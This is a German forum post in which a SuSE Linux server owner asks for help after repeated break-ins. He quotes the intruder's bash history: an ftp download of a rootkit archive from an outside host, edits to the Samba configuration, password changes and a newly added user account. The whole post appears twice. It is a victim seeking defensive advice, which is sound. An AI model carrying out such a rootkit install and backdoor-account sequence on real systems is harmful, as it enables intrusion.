th.henkel
14.09.03, 19:48
Hallo zusammen,
da sagt man, dass Linux eines der sichersten Systeme ist und dann sowas.
Ich nutze seit einigen Jahren Linux als Serversystem für verschiedene CLients. Letztes Jahr bin ich wegen T-DSL auf Suse 7.3 Professional umgestiegen. Seit ca. 2 Monaten habe ich Sicherheitsprobleme, obwohl eine Firewall alle ankommenden Verbindungen ablehnt (PersonalFirewall) und die IP durch Neueinwahl oft wechselt. Ich route über IPforwarding einige Cleints (Windoof) ins Netz.
Iregendwelche Idioten loggen sich trotzdem auf meinen Server ein und können dort Benutzer anlegen SambaKonfig verändern und und und.
Ich habe bereits zum dritten mal neuistalliert und vertraue nur noch meinen original CDs. Tortzdem gelingt es denen immer wieder Zugriff zu erlagen. Dass ich alle Benutzer jedesmal verändert habe (Name und Psswd) ist selbstverstänlich.
Der letzte Angriff hat in der Bash History folgende Zeilen hinterlassen (die verwischen nicht mal ihre Spuren):
> ftp wasyu-kirik.webstrikesolutions.com
> tar -zxvf resikroot.tar.gz
> rm -rf resikroot.tar.gz
> cd clean
> rem root
> cd
> cd /etc/samba
> pico smb.conf
> /etc/init.d/smb restart
> /etc/init.d/smb stop
> /etc/init.d/smb start
> cd
> passwd news
> logout
> useradd http
> passwd http
> logout
> passwd http
> logout
> ftp wasyu-kirik.webstrikesolutions.com
> pico smb.conf
> logout
> exit
Wer kann mir helfen. Wie schütze ich mich besser?
Vielen Dank im Voraus
da sagt man, dass Linux eines der sichersten Systeme ist und dann sowas.
Ich nutze seit einigen Jahren Linux als Serversystem für verschiedene CLients. Letztes Jahr bin ich wegen T-DSL auf Suse 7.3 Professional umgestiegen. Seit ca. 2 Monaten habe ich Sicherheitsprobleme, obwohl eine Firewall alle ankommenden Verbindungen ablehnt (PersonalFirewall) und die IP durch Neueinwahl oft wechselt. Ich route über IPforwarding einige Cleints (Windoof) ins Netz.
Iregendwelche Idioten loggen sich trotzdem auf meinen Server ein und können dort Benutzer anlegen SambaKonfig verändern und und und.
Ich habe bereits zum dritten mal neuistalliert und vertraue nur noch meinen original CDs. Tortzdem gelingt es denen immer wieder Zugriff zu erlagen. Dass ich alle Benutzer jedesmal verändert habe (Name und Psswd) ist selbstverstänlich.
Der letzte Angriff hat in der Bash History folgende Zeilen hinterlassen (die verwischen nicht mal ihre Spuren):
> ftp wasyu-kirik.webstrikesolutions.com
> tar -zxvf resikroot.tar.gz
> rm -rf resikroot.tar.gz
> cd clean
> rem root
> cd
> cd /etc/samba
> pico smb.conf
> /etc/init.d/smb restart
> /etc/init.d/smb stop
> /etc/init.d/smb start
> cd
> passwd news
> logout
> useradd http
> passwd http
> logout
> passwd http
> logout
> ftp wasyu-kirik.webstrikesolutions.com
> pico smb.conf
> logout
> exit
Wer kann mir helfen. Wie schütze ich mich besser?
Vielen Dank im Voraus